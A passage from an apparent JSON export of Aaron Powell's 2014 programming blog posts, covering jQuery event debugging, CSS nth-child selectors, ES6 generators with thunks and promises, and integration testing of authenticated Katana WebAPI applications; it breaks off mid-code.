and capturing your listeners into an array so that when the event does fire it can loop over them all and trigger them.\nDebugging the unknown Right-o so our event handlers are hidden away behind a wrapper that triggers them from a generic function, that could pose a problem couldn’t it?\nConveniently jQuery offers a bit of a backdoor into its internals which we can leverage for this purpose, and that’s $._data.\nIt’s worth pointing out that $._data is an "internal" jQuery API which is undocumented, it might be removed one day so use it with caution.\nThis method takes 3 arguments, but for our purpose we’re really only interested in the first, which is a DOM element. Note that this is a DOM element and not a jQuery element, passing in a jQuery element will not yield the results you desire.\nFun fact, to get to the DOM element from a jQuery selector access its array index - $('.foo')[0].\nNow, calling $._data will return us an object, like so:\n$._data(document.getElementById('myElement')); // -> { events: { ... }, ... } There’s a bunch of properties on this returned object but the one we’re interested in is the events property. This property is an object that has properties representing all the event handlers which you have attached, so something like this:\n{ events: { click: [] } } From this array we now have access to all our click handlers, they’ll look something like this:\n{ data: null, guid: 1, handler: function () { ... }, namespace: "", needsContext: undefined, origType: "click", selector: undefined, type: "click" } Awesome, there’s your event handler, it’s on the handler property, copy that text and search your codebase for it.\nActually debugging Right so we’ve found our event handler, or at least a text version of it, it’d be better if we could actually step into it, find out which file we’re coming from.
Wouldn’t it be cool if we could insert breakpoints?\nWe can do that with some tricks:\n(function () { var element = $('.selector')[0] var clicks = $._data(element).events.click; clicks.forEach(function (click) { var handler = click.handler; click.handler = function () { debugger; handler.apply(this, arguments); }; }); })(); Do you see what we’re doing from our simple function? We’re:\nGetting all our click handlers and looping over them Capturing the original handler into the handler variable Creating a new handler which uses the debugger keyword to attach a JavaScript debugger Using apply to invoke the handler with the expected arguments Now we get a breakpoint which we can step into our event handler with!\n", "id": "2014-03-06-debugging-jquery-events" }, { "title": "What I learned about nth-child selectors", "url": "https://www.aaron-powell.com/posts/2014-03-12-what-i-learned-about-nth-child-selectors/", "date": "Thu, 06 Mar 2014 00:00:00 +0000", "tags": [ "css" ], "description": "Today I learned something important about the `nth-child` CSS selector that seems to be a common misconception.", "content": "Today I learned an interesting fact about how the nth-child CSS selector works and it was different to what I expected and what seems to make sense.\nI had the following HTML snippet:\n<div class="input-group"> <div class="legacy"> <div class="input-subgroup"> <input name="itemId" id="Type0" type="radio" checked="checked" value="1"> <label for="Type0">Single</label> </div> <div class="input-subgroup"> <input name="itemId" id="Type1" type="radio" value="2"> <label for="Type1">Couple</label> </div> <div class="input-subgroup"> <input name="itemId" id="Type2" type="radio" value="3"> <label for="Type2">Family</label> </div> </div> <div class="new"> <div class="input-subgroup"> <input name="somethingElse" id="somethingElse" type="text" maxlength="2" placeholder="Enter" value=""> </div> <div class="input-subgroup"> <input name="somethingElse2" id="somethingElse2" type="text" maxlength="2" placeholder="Enter" value=""> </div> </div> </div> And I wanted to find the input[type="radio"] at a particular position in the DOM.\nSo I started with this snippet:\nvar group = document.getElementsByClassName('input-group')[0]; var couple = group.querySelectorAll('.legacy input[type="radio"]:nth-child(2)'); And was confused when that didn’t work, I’m wanting to find the 2nd radio button, and that reads right, it’s the 2nd radio button under the class="legacy" element, so it makes sense… Right?\nBut I was missing a point, that it’s the nth-child and in my DOM input[type="radio"] isn’t actually a child of class="legacy", it’s a descendant so what I’m really after is nth-descendant, which isn’t a real selector.\nThe fix It’s a pretty easy fix if you know your DOM, change the selector to:\n.legacy :nth-child(2) input[type="radio"] Since we know that the radio button is in the nth-child(2) of .legacy and we are properly locating the children based on their position.\nYou can see the broken one here and the working one here.\n", "id": "2014-03-12-what-i-learned-about-nth-child-selectors" }, { "title": "Easily replacing Assert.IsTrue statements", "url": "https://www.aaron-powell.com/posts/2014-02-12-easily-replacing-assert-istrue-statements/", "date": "Wed, 12 Feb 2014 00:00:00 +0000", "tags": [ "unit-testing", "testing" ], "description": "It's time to really address that annoying habbit of developers to use `Assert.IsTrue` in their tests.", "content": "I blogged/ranted about Assert.IsTrue previously, well today 
I decided to work out a quick way to do bulk conversions of tests.\nWell the easiest way to go about this is using a good old Regular Expression:\nAssert\\.IsTrue\\((?<Actual>.*)\\s*==\\s*(?<Expected>.*)\\) That’s a regex which is ideal for using from Visual Studio, or any other tool that supports named capture groups. If you don’t have something like that you can use numerical capture groups:\nAssert\\.IsTrue\\((.*)\\s*==\\s*(.*)\\) Now for the replace regex:\nAssert.AreEqual(${Expected}, ${Actual}) Or for numbered capture groups:\nAssert.AreEqual(${2}, ${1}) Or maybe you’re using NUnit and want to use Assert.That (which some people argue is more readable), try this out:\nAssert.That(${Actual}, Is.EqualTo(${Expected})) Bonus, adding messages As a friend of mine, Jason Stangroome, pointed out you might also want to include a message with the assert for additional information when it’s failing, so we’d update our replacement like so:\nAssert.AreEqual(${Expected}, ${Actual}, "${Actual} was expected to have the value of " + ${Expected}) This will add the name of the variable we are asserting.\n", "id": "2014-02-12-easily-replacing-assert-istrue-statements" }, { "title": "Cleaning up promises with yield", "url": "https://www.aaron-powell.com/posts/2014-01-28-cleaning-up-promises-wit-yield/", "date": "Tue, 28 Jan 2014 00:00:00 +0000", "tags": [ "javascript", "es6" ], "description": "Previously we looked at cleaning up callback hell with thunks and generators, but in this post we'll look at the next approach to managing callbacks, Promises, and how we could clean that up with generators.", "content": "Last time we cleaned up callback hell with yield but callbacks in the design which I was talking about are not all that common these days, especially if you’re working in the browser. When you’re in the browser there’s a good chance you’re going to be working with Promises, and more accurately Promise/A+.\nIf you’re unfamiliar with Promises, it’s a specification which states that you have an object which exposes a then method which will either fulfill or reject some operation. You’ve probably come across it with AJAX requests:\n$.get('http://jsbin.com/ikekug/1.js').then(function (data) { //do something with the successful response }, function (err) { //do something with an error }); So libraries like jQuery provide a Promise API (well, it’s not exactly Promise/A+) or there are dedicated libraries like Q. Even my db.js exposes a Promise-like API, so it’s a pretty common thing to find around the shop.\nWith the proliferation of Promises the question is, could we clean up Promises like we did with thunk’ed functions? Basically getting us back to doing this:\nvar getData = function* () { let data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); }; Reimplementing get In the last post we had a get method which did our AJAX query, so we’ll start with that:\nlet get = function (url) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); }); xhr.send(); }; But now we need to make it use a Promise. There’s heaps of different Promise libraries which we could leverage, or we could leverage the native browser support for Promises!
But be aware that this is super bleeding edge and it really doesn’t have great support yet, but bugger it we’re already using bleeding edge so why not go further!\nlet get = function (url) { return new Promise(function (fulfill, reject) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { if (xhr.status == 200) { var o = JSON.parse(xhr.responseText); fulfill(o); } else { reject(Error(xhr.statusText)); } }); xhr.send(); }); }; Right, now we can do something like this:\nget('http://jsbin.com/ikekug/1.js').then(function (data) { console.log(data); }); So we’re returning a new Promise instance from the browser and for that promise we have the contents of our get method from earlier. Once this completes we either fulfill the promise, because it was successful, or reject it on an error.\nReimplementing runner Now we need to reimplement our runner function, previously it assumed that the function to be yielded was a thunk, but this time it’s not, so we need to refactor it to make it understand how to handle the promise, and to deal with the fulfill/reject pipeline which it uses.\nlet runner = function (fn) { let cont = function (method, arg) { }; let it = fn(); let fulfilled = cont.bind(this, 'next'); let rejected = cont.bind(this, 'throw'); return fulfilled(); }; Ok here’s our method skeleton, I’ve got a cont function (which used to be called next) which will be used to handle stepping through the iterator’s next method, but I’m actually creating a wrapper around it which contains either next or throw as the first argument (method). So why are we doing this? To understand that we need to look at how cont works:\nlet runner = function (fn) { let cont = function (method, arg) { var result; try { result = it[method](arg); } catch (e) { return Promise.reject(e); } if (result.done) { return result.value; } return Promise.cast(result.value).then(fulfilled, rejected); }; let it = fn(); let fulfilled = cont.bind(this, 'next'); let rejected = cont.bind(this, 'throw'); return fulfilled(); }; Here’s our fully reimplemented runner method which includes the cont method completed. Because we’re creating "wrappers" around the cont method using Function.bind we’re able to use the exact same method for both stepping through to the next iteration, or raising an error (for more on Function.bind check out my previous post).\nLet’s walk through what happens:\nThe runner starts up, creates our iterator, creates our wrappers and then invokes fulfilled This invokes the cont function with the method argument equaling next The expression it[method](arg) is really it['next'](arg) which is the same as it.next(arg) Sweet, by using bind we can choose what method on the iterator to invoke, either next or throw.\nContinuing down the assumption that we’re using next, we wrap this in a try/catch, and if the call fails we immediately reject a Promise. Using the Promise.reject method means we’re creating a promise that can only fail.\nAssuming that was successful we do our check for the iteration being done, and in that case we just exit out of the Promise chain, but if we’ve got a continuation point we’ll create yet another Promise using Promise.cast, which will either create a new promise or, if result.value was a promise, return that, and from here we’ll then provide the same fulfilled and rejected functions so that it will step into the iteration again. This call to Promise.cast is important because what we’re doing is ensuring that we can deal with Promise chaining.
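To see the two pieces working together, here’s a quick sketch reusing the get and runner defined above (same test URL as earlier):

runner(function* () {
  // the runner calls it.next(), which runs to the yield and hands it the Promise from get
  // Promise.cast picks that promise up and, once it fulfills, resumes the generator
  // with the parsed JSON as the result of the yield
  let data = yield get('http://jsbin.com/ikekug/1.js');
  console.log(data);
});

A failed request flows through the rejected wrapper instead, which calls it.throw, so a try/catch around the yield inside the generator would catch it.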
One of the nice things about Promises is that they return a Promise, so we can do .then().then().then() and so on.\nNow we’ve got an implemented runner method which will go and execute our Promise-based yields.\nConclusion Today we’ve looked at the other approach to solving callback hell, Promises, and how we can combine that with the new approach to doing asynchronous programming in JavaScript through generators.\n", "id": "2014-01-28-cleaning-up-promises-wit-yield" }, { "title": "Cleaning up callbacks with yield", "url": "https://www.aaron-powell.com/posts/2014-01-18-calling-up-callbacks-with-yield/", "date": "Sat, 18 Jan 2014 00:00:00 +0000", "tags": [ "javascript", "es6" ], "description": "We'll continue our exploration into the new `yield` and have a look at how it can be used to avoid the so-called callback hell which can plague JavaScript applications.", "content": "In my last post we took a journey on how to make a function execute in a delayed fashion by using the new yield keyword coming in ES6. But we were still working with what was essentially a synchronous code path, we just used yield to halt its execution. By the end of the post we used setTimeout to buffer our execution time, making it asynchronous in its execution.\nBut the fact of the matter remains this is still synchronous code that we’re dealing with, and in JavaScript synchronous programming isn’t the only way we work, much of what we do is asynchronous. This can lead to what is commonly referred to as callback hell and it’s the bane of JavaScript developers everywhere.\nNow there’s a number of different ways which you can tackle this, Promises being one of the popular options. I’m not going to talk about Promises in this post though, I just want to focus on the raw problem of callbacks.\nLet’s go with the following as our baseline code:\nvar getData = function* () { let data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); }; That’d be nice and clean code if we could get to it now wouldn’t it? And if we think about how it works it wouldn’t seem that difficult to achieve would it? As we learnt last time the right hand side of the yield statement gets evaluated in one next() call and we can pass the result of that through to the following next() call to do a left-side assignment.\nImplementing get I’m not going to use any JavaScript library for doing our AJAX get, I’m going to do it raw like I talked about here.\nSo our get method would look like this:\nlet get = function (url) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); }); xhr.send(); }; Hmm, something about this doesn’t look right, how are we getting the value of o back out of the callback handler for load? Well we need to return something so that it can be returned from the next() call, but returning something from get wouldn’t make sense, it’s actually the value from the load callback that we want, but we can’t return from there either as it’d be a different scope, so what can we do?\nThunk The problem is we need to be able to return a value from inside a callback, and really the best way for us to do that is to change how we write our function, we’re going to have to make a Thunk.
Now our function will look like this:\nlet get = function (url) { return function () { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); }); xhr.send(); }; }; Well that didn’t really change anything did it. So why did we introduce a thunk?\nExecuting our generator So far in all of the examples I’ve walked through we’ve executed our generator functions by either the use of a for-of statement, or by iteratively calling next(). In a real-world scenario this is a bit less than ideal isn’t it, after all to call next() you either have to keep checking if it’s done, or know exactly how many times to call next(). What would be better is if we had something to take care of that for us.\nLet’s get started:\nlet runner = function (generator) { }; Now this runner function won’t be a generator itself, it will just be able to handle generators. Ultimately what this function will do is take a function (which is assumed to be a generator) and handle the calls to next, passing the correct value until it’s done. So what’s the best way to do that? Could we do a while loop like we used in the last post? Well that won’t work with the asynchronous problems we’re trying to solve because we’ve got no way to grab that return value if we try and be synchronous.\nSo what’s the solution to that? A recursive function:\nlet runner = function (generator) { let next = function (arg) { }; let it = generator(); return next(); } Here what I’ll be doing is:\nCreate a function that will handle calling next, imaginatively named next\nGet the iterator\nStart the recursion\nlet next = function (arg) { var result = it.next(arg); };\nEach time through next we’ll capture the result of the iterator’s next call, taking the argument from when it was last called and passing it through to the iterator. Also this takes care of the fact that you can’t give an iterator an argument for its first iteration, which we handle by simply not passing anything on the first call.\nlet next = function (arg) { var result = it.next(arg); if (result.done) { return; } next(result.value); } And now our function will run through all steps of an iterator quite happily as a recursive function, but still we’re not dealing with asynchronous operations. Well this is where our Thunk will come in, we’ll check if the return type is a function. But more than that we’ll pass the next function as the argument to our Thunk:\nlet next = function (arg) { var result = it.next(arg); if (result.done) { return; } if (typeof result.value == 'function') { result.value(next); } else { next(result.value); } }; For this to work we’d better go update our Thunk:\nlet get = function (url) { return function (cont) { var xhr = new XMLHttpRequest(); xhr.open('GET', url); xhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); if (cont) cont(o); }); xhr.send(); }; }; So what’s going on here?\nWhen yield get('...') is called it will return a function as result.value result.value is received by our recursive function and detected to be a function Control over when the iterator will continue is up to our Thunk The important point to note is the last point, we hand over continuation control to our asynchronous operation.
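To make that handover concrete, here’s a rough trace of one round trip using the runner and thunked get from above (same test URL as before):

runner(function* () {
  // 1. runner calls it.next(), which runs the generator up to the yield
  // 2. get(url) has produced the thunk, so result.value is a function
  // 3. the runner calls that thunk, passing next as the continuation
  // 4. when the XHR 'load' event fires the thunk calls cont(o), i.e. next(o)...
  let data = yield get('http://jsbin.com/ikekug/1.js');
  // 5. ...which resumes the generator here with data set to the parsed response
  console.log(data);
});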
Let’s look at another way we can use this:\nlet sleep = function (ms) { return function (cont) { setTimeout(cont, ms); }; }; runner(function* () { console.log('start'); yield sleep(1000); console.log('end'); }); Does that make sense? Our Thunk receives a function to execute when it is done. This can be executed immediately or this could be executed after an asynchronous operation completes. We can also pass an argument to it which is our return value from the yield statement.\nAnd finally we can make our generator like this:\nlet fn = function* () { let data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); yield sleep(1000); data = yield get('http://jsbin.com/ikekug/1.js'); console.log(data); yield sleep(1000); console.log('done'); }; runner(fn); Conclusion Today we’ve had a look at how we can solve the problem of callback hell by the use of ES6 generators, in a fashion that reminds me very much of C#’s async/await.\nWe’ve seen that with a little change to the way we write functions, by introducing Thunks, we can create functions which can be used in a continuation manner.\nBonus code One of the first places I see generators being used is in Node.js (you can use them in Node.js 0.11.x with the --harmony flag) since you only have a single JavaScript engine to deal with. Also the Node.js APIs are written pretty close to what we’re executing already, so with a few tweaks we can take our runner function into Node.js:\nlet runner = function (fn) { let next = function (err, arg) { if (err) { return it.throw(err); } var result = it.next(arg); if (result.done) { return; } if (typeof result.value == 'function') { result.value(next); } else { next(null, result.value); } } let it = fn(); return next(); } let thunker = function (fn) { var args = [].slice.call(arguments, 1); return function (cont) { args.push(cont); fn.apply(this, args); }; }; We could then do something like reading folders:\nrunner(function* () { var contents = yield thunker(fs.readdir, 'node_modules'); console.log(contents); }); ", "id": "2014-01-18-calling-up-callbacks-with-yield" }, { "title": "Functions that yield multiple times", "url": "https://www.aaron-powell.com/posts/2014-01-13-functions-that-yield-mutliple-times/", "date": "Mon, 13 Jan 2014 00:00:00 +0000", "tags": [ "javascript", "es6" ], "description": "Generator functions in ES6 don't have to just do a single `yield`, they can `yield` multiple times, but when doing so how do you execute those functions?", "content": "I recently introduced you to JavaScript generators which I think are a really interesting feature that we should look at for the future of JavaScript. In that blog post I was talking about LINQ in JavaScript and kind of glossed over an important part of generators, and that’s how you use them if you’re not using a for-of loop. While generators make a lot of sense in the scope of managing datasets that isn’t their only usage, in reality generators are quite useful if you want to lazily execute any function.\nEager functions Before we dive into lazy functions let’s talk about eager functions. What do I mean when I say something is an eager function?
Let’s take the following function:\nvar ticTacToe = function (size) { console.log('Shall we begin?'); var blank = '-'; var board = [ ]; for (var width = 0; width < size; width++) { board[width] = [ ]; for (var height = 0; height < size; height++) { board[width][height] = blank; } } var area = size * size; var findMove = function () { var base = Math.trunc(area / 10); var move = Math.trunc(Math.random() * (base + 1) * 10); return move; }; var playMove = function (player) { var move = findMove(); while (move > area - 1) { move = findMove(); } var row = Math.trunc(move / size); var segment = board[row]; move = move - (row * size); if (segment[move] === blank) { segment[move] = player; } else { return playMove(player); } }; var printBoard = function () { var boardLayout = board.reduce(function (str, segment) { return str + segment.join(' ') + '\\n'; }, '\\n'); console.log(boardLayout); }; var players = 'XO'; for (var i = 0; i < area; i++) { playMove(players[i % players.length]); } console.log('Game over'); printBoard(); var rowWinner = board.filter(function (row) { var first = row[0]; for (var i = 1; i < row.length; i++) { if (row[i] !== first) { return false; } } return true; }); if (rowWinner.length) { console.log('The row winner was...', rowWinner[0][0]); } }; Ok so what we’ve got here is a very crappy automated tic-tac-toe game, it just randomly places the X and O on the board (of what ever size you want) and occasionally someone wins (but generally not). While how this code works is not particularly interesting (and to be honest I’ve just whipped it up quickly while on an international flight, so it’s not my best code!) what it represents is interesting, it represents something happening that could be time consuming, but more importantly it’s something that you kind of want to watch unfold. If you run this code the game is immediately completed because this is an eager function, it executes, you wait for it do be done and only then can you see what’s happened; there’s no way to pause the game at a particular point and see it in action. Alternatively if we took the code a bit further and added a simple AI to it each move would take subsequently longer than the last one to play as the program works out where would be the best place to play its move.\nNow that’d be less than ideal, it might seem like our game has frozen, and as soon as a user believes that we’ve really shot ourselves in the foot.\nThis is the problem of eager functions, we start them and we have to wait for them to finish, even if we are concerned they are taking too long. There are JavaScript design patterns you can leverage to get around this, splitting a function up over setTimeout or requestAnimationFrame, but these can be hard to implement as your function has to know what is/isn’t acceptable for its execution duration.\nLazy functionsSo hopefully you’ve got a bit of an idea what an eager function is, if you run the above code you’ll see it can take a while, especially when you make the board size large (so far no game as been won at 20x20, and it kept having recursion errors above that). What’d be nice is if we could pause the game at any point and see what the board looks like, but the function doesn’t know to stop, it just keeps executing line after line until there’s no more lines of code to execute.\nWell this is where a generator function comes in. 
Let’s start really simple:\nvar fn = function* () { console.log('start'); yield console.log('doing'); console.log('done'); }; So what do you think would happen when you run that function?\nfn(); Well nothing happened, we got no console messages logged out. Ok, that’s not true something did, we created a new iterator instance from our function because generators are iterators. So to actually do something we need to capture the iterator:\nlet iterator = fn(); Right so still nothing observable has happened and that’s because we haven’t moved through our iterator. To do that we call the next method on it:\niterator.next(); Now we’ll see this in our output:\n"start" "doing" Notice that we’ve output start and doing but not done. Here’s were we have gotten to making a lazy function and our function has run as far as we’ve told it to run. There might be more to the function, we’ve just put it on hold. If we were to call next again we’d have the final console.log statement executed and the function would complete as there’s no more yielding to be done.\nKnowing your iterator is done It’s all well and good in our example up there to know that we need to call next() twice because we know the make-up of the function, but what if we didn’t? How would you know when you stop calling next()?\nConveniently the next() method will tell you that, it returns an object like so:\n{ value: value|undefined, done: true|false } By looking at the done property of this object we can work out whether there are any more steps to be executed. In fact this is what the for-of loop does, in fact for-of can be decomposed to look like this:\nvar x; while (!(x = it.next()).done) { } You might be thinking “well wouldn’t you just use the for-of loop then?” and that’s a good question, the for-of loop nicely takes care of stepping over each yield and executing them.\nControlling yielded values Not every instance of using yield will be for the purpose of yielding statements, sometimes you might want to yield a value. Here’s a slightly updated version of our function from above:\nvar fn = function* () { console.log('start'); yield console.log('doing'); let x = yield 1; console.log('done', x); }; Alright, so a for-of loop can walk that for us right:\nfor (var x of fn()) { //do nothing } Outputs:\n"start" "doing" "done" undefined Oh, that’s not right, why is the value of x undefined? Well to understand that you need to understand how we yield values, this is part of the returned object from calling next(), so let’s do this:\nconsole.log(it.next()); console.log(it.next()); console.log(it.next()); Now our output looks like:\n"start" "doing" {value: undefined, done: false} {value: 1, done: false} "done" undefined {value: undefined, done: true} Ahh, notice the value: 1 in there, you probably want to do something with that.\nWhat you want to do with it is pass it as the first argument to the next() method call for you see next takes an argument with is the result of the yield.\nLet’s do this:\nit.next(); it.next(); it.next(42); We now get:\n"start" "doing" "done" 42 Wait… but we said let x = yield 1 not let x = yield 42, so why did it use the 42 we passed as an argument rather than the value we actually yielded? 
Well it turns out that yield doesn’t work that way, what yield does is:\nProvides the yielded value to the iterator Takes the argument provided to next and passes that through to the assignment (or in the case of no assignment it’ll just ignore it) So this gives us the power to manipulate the iterator at any yielded point from the outside, we can set up new values at yielded points, or stop processing the iterator if a particular value is yielded. This is also why for-of doesn’t work, it will call next but not provide any arguments so you can’t yield values for assignment inside of a for-of loop.\nMaking our game lazySo what points during our game do you think we’d want to pause? Maybe when the board has been created (hey, you could make that something to manipulate!) and after each move, that all seems reasonable. Here’s our updated game:\nvar ticTacToe = function* (size) { console.log('Shall we begin?'); var blank = '-'; var board = [ ]; for (var width = 0; width < size; width++) { board[width] = [ ]; for (var height = 0; height < size; height++) { board[width][height] = blank; } } yield board; var area = size * size; var findMove = function () { var base = Math.trunc(area / 10); var move = Math.trunc(Math.random() * (base + 1) * 10); return move; }; var playMove = function (player) { var move = findMove(); while (move > area - 1) { move = findMove(); } var row = Math.trunc(move / size); var segment = board[row]; move = move - (row * size); if (segment[move] === blank) { segment[move] = player; } else { return playMove(player); } return [board, move, move + (row * size), segment]; }; var printBoard = function () { var boardLayout = board.reduce(function (str, segment) { return str + segment.join(' ') + '\\n'; }, '\\n'); console.log(boardLayout); }; var players = 'XO'; for (var i = 0; i < area; i++) { yield playMove(players[i % players.length]); } console.log('Game over'); printBoard(); var rowWinner = board.filter(function (row) { var first = row[0]; for (var i = 1; i < row.length; i++) { if (row[i] !== first) { return false; } } return true; }); if (rowWinner.length) { console.log('The row winner was...', rowWinner[0][0]); } }; I’m not doing any assignment from the yielded values, you can play with that yourself, but we can now look at the state of the board after each move:\nvar game = ticTacToe(3); game.next(); let [board] = game.next().value; console.log(board); And there we go, we can see the state of the board as we are going along. I’m also using destructuring to get the board out of the value, which is an array.\nNow we can start placing bets on who is likely to win, with the odds getting smaller as the board fills up, by us calling next(). Although it’d be crappy odds to start with since the whole thing is based off a random number generator!\nvar game = ticTacToe(3); game.next(); var done = false; setTimeout(function step() { let obj = game.next(); done = obj.done; if (done) { return; } printBoard(obj.value[0]); console.info('place your bets'); setTimeout(step, 5000); }); ConclusionThroughout this post we’ve seen how standard JavaScript functions can have some limitations when their logic is complex and time consuming (or dumb but time consuming). We then took a look at how to use generator functions to make a function lazy so we can step through it at a desired pace. We’ve then seen how to determine when an interator has completed and how we can manipulate the values which we are yielding. 
Finally we rewrote our initial function to be a generator function and we ran through it in a delayed fashion.\n", "id": "2014-01-13-functions-that-yield-mutliple-times" }, { "title": "Integration testing authenticated Katana applications", "url": "https://www.aaron-powell.com/posts/2014-01-12-integration-testing-katana-with-auth/", "date": "Sun, 12 Jan 2014 00:00:00 +0000", "tags": [ "owin", "katana", "testing" ], "description": "A look at how you can write integration tests with the new ASP.Net Katana project web applications when they are behind an authentication layer.", "content": "Recently I got to work on a project where we were building an ASP.Net WebAPI project for the client. One of the requirements of this project was that the API which we produced was authenticated, basically everything exposed had to be authenticated, and because it was a brand new project we decided to go down the path of WebAPI 2.0 and use the new Katana/OWIN system along with OAuth for the authentication.\nAnother hurdle we had when putting the API together was that it was to sit on top of a legacy system which contained a lot of business logic which was written in a way which we couldn’t unit test, it was very tightly coupled to the database and as our timelines didn’t allow us to rewrite it all from scratch we instead opted to rely on integration testing.\nBut that raises an important question, how do you run your WebAPI endpoint to be used in the tests? You could:\nStart up IIS Express, like you’re F5-ing from Visual Studio (how we were developing) Deploy to IIS, but then you’re deploying code that hasn’t ticked all the boxes Neither of these were ideal solutions, while IIS Express is ok for development it’s not truly IIS so your integration tests are already one step removed from the real environment, meaning they are less accurate. As for deploying to IIS, we deemed that to be equally as risky; you’re either requiring the build server to also have IIS running on it or you’re deploying to another server and then you’ve got to handle the deployments, how do you setup/teardown the IIS instance? Do you do it as part of the test run? Again this was feeling like adding risk that we shouldn’t need to have for preconditions.\nOWIN to the rescue I’ve blogged and presented about OWIN in the past, it’s a really cool concept and this was the first time I was looking to do a production deployment using it, and there’s one feature of OWIN that made it really appealing to solve our problems… Self Hosting.\nBecause OWIN is a separation between your code and the hosting platform your code doesn’t care how it’s hosted, only that it is, so you can go from hosting in IIS to self hosting inside an assembly with very little effort and this is what we were enticed by, through the self hosting we could spin up our API project inside of the test project as a HTTP server and then interact with it via HTTP client requests! AWESOME!\nI’m not going to blog on how to do that, Filip W beat me to it so that solved our first problem, being able to set up an integration test which ran our server.\nSide note: You may be thinking that because we’re using Self Host and not IIS (which is the production host) that we’ve got a similar problem to using IIS Express but I’d disagree. We’re still using the full WebAPI stack, we’re still using the full OWIN/Katana stack, we’re just not using IIS and your application should be none the wiser.
If your application knows it’s running on IIS then I’d argue you have a bigger problem.\nHandling authentication As I said, one of the main bridges we’d have to cross on this project was that all the API calls were to be authenticated, which means that when you’re running your tests you need to take that into account. So what do you do? Well you could write something to bypass the authentication for the test run, but then your integration test is no longer really representative.\nBut what you need to remember is that because you’re running your code through a self hosted WebAPI you’ve got the full WebAPI stack, so the [Authorize] attribute will be in effect and you’re going to actually have an authenticated request pipeline.\nOk, let’s take the starting point that Filip W gave us, and start expanding on it, I’m going to extract my server setup into its own base class:\npublic abstract class BaseServerTest { protected TestServer server; [TestInitialize] public void Setup() { server = TestServer.Create(app => { var startup = new Startup(); startup.ConfigureAuth(app); var config = new HttpConfiguration(); WebApiConfig.Register(config); app.UseWebApi(config); }); } [TestCleanup] public void Teardown() { if (server != null) server.Dispose(); } } So what we’ve got here is a call to create a new in-memory OWIN server, it’s using the Startup class that my WebAPI app would use, and the WebAPI configuration (so routes, filters, etc) is applied. Now I want to make it easier to handle the GET and POST methods. To do this I’m going to add an abstract property to represent the URI that the tests are for, and two method stubs:\nprotected abstract string Uri { get; } protected virtual async Task<HttpResponseMessage> GetAsync() { throw new NotImplementedException(); } protected virtual async Task<HttpResponseMessage> PostAsync<TModel>(TModel model) { throw new NotImplementedException(); } Now I’m going to quickly jump over to writing some integration tests for my user registration because, well, I’ll need to register a user before I can run any tests:\n[TestClass] public class AccountControllerTests : BaseServerTest { [TestMethod] public async Task CanRegisterUser() { } private string uriBase = "/api/account"; private string uri = string.Empty; protected override string Uri { get { return uri; } } } I’ve split the URI into two parts, there’s the URI base, being /api/account, and the actual URI for the abstract class implementation. The reason for this is that (at least in the default WebAPI project template) the AccountController isn’t just a REST interface, but instead has multiple methods on it that I’ll want to hit (things like change password, login and so on which I won’t cover in this post). So let’s go ahead and implement the test method itself:\n[TestMethod] public async Task CanRegisterUser() { uri = uriBase + "/register"; var model = new RegisterBindingModel { UserName = "aaronpowell" + DateTimeOffset.Now.Ticks, Password = "password", ConfirmPassword = "password" }; var response = await PostAsync(model); Assert.AreEqual(HttpStatusCode.OK, response.StatusCode); } What am I doing here?
I’m:\nSaying that this request is going to hit /api/account/register Using the model which the AccountContoller.Register method is taking as an input argument Calling my PostAsync method Asserting that we got a successful response Additionally you could write an assert that peaks into the database and validates that the user is there, but that’s an exercise for the reader.\nI really like that you can use the model from WebAPI to do the processing, this gives us the advantage of:\nType safety, if the class is refactored our test will also be refactored We leverage model binding and model validation Side note: You’ll notice I’m appending DateTimeOffset.Now.Ticks to the username, that’s because we need a unique username each time. Depending on whether you’re creating a new DB for each test run or not you may want to handle this better.\nSo how does our PostAsync work? Well let’s implement it:\nprotected virtual async Task<HttpResponseMessage> PostAsync<TModel>(TModel model) { return await server.CreateRequest(Uri) .And(request => request.Content = new ObjectContent(typeof(TModel), model, new JsonMediaTypeFormatter())) .PostAsync(); } Yep it’s really quite simple. You’ll see here that I’m grabbing the Uri property our class implements, which saves it being passed in, and then we’re just leveraging the methods available from the TestServer class to build up the request and eventually POST the content up. But how do we get the content up there? Well we leverage the And extension method which we have a lambda that can set properties on the request, in this case we setting the request content, serialized as JSON, but you can use any available MediaTypeFormatter so this can be nifty if you’re working with your own formatters.\nNow if we run our test it should pass with flying colours.\nMaking a GET We’ve got the POST sorted, what about GET? This time I’m going to go for the ValuesController (which comes in the default project template). Now this is an authenticated controller so we can start off with writing a test that if there’s no credentials we fail our test:\n[TestClass] public class ValuesControllerTests : BaseServerTest { [TestMethod] public async Task ShouldGetUnauthorizedWithoutLogin() { var response = await GetAsync(); Assert.AreEqual(HttpStatusCode.Unauthorized, response.StatusCode); } protected override string Uri { get { return "/api/values"; } } } So this Assert should make sense, no credentials, you get a 401 response. But what does the GetAsync method look like?\nprotected virtual async Task<HttpResponseMessage> GetAsync() { return await server.CreateRequest(Uri).GetAsync(); } Sorry, not very exciting is it! Really all we’re doing is nicely wrapping around the CreateRequest method call\nWhere’s the authentication?Right we’ve got a bunch of unauthenticated requests out of the way, now it’s time to look at how we can do some authenticated requests. 
For this I’m going to create another base class that extends our BaseServerTest:\npublic abstract class BaseAuthenticatedTests : BaseServerTest { protected virtual string Username { get { return "aaronpowell"; } } protected virtual string Password { get { return "password"; } } private string token; } For the authenticated tests I’m going to do them against a user that is known to exist, you could do it a bunch of different ways, like performing a registration for each test, that really comes down to how complex your registration process is.\nAlso I don’t want the author of authenticated tests to have to worry about the authentication side of things, it should just work for them. So to do this I’m going to extend my BaseServerTest class to all me to run something when the server is setup:\n[TestInitialize] public void Setup() { server = TestServer.Create(app => { var startup = new Startup(); startup.ConfigureAuth(app); var config = new HttpConfiguration(); WebApiConfig.Register(config); app.UseWebApi(config); }); PostSetup(server); } protected virtual void PostSetup(TestServer server) { } What I’ve added here is a virtual method PostSetup which is called when the server is ready and then we can do additional stuff. Let’s implement it in our BaseAuthenticatedTest:\nprotected override void PostSetup(TestServer server) { var tokenDetails = new List<KeyValuePair<string, string>>() { new 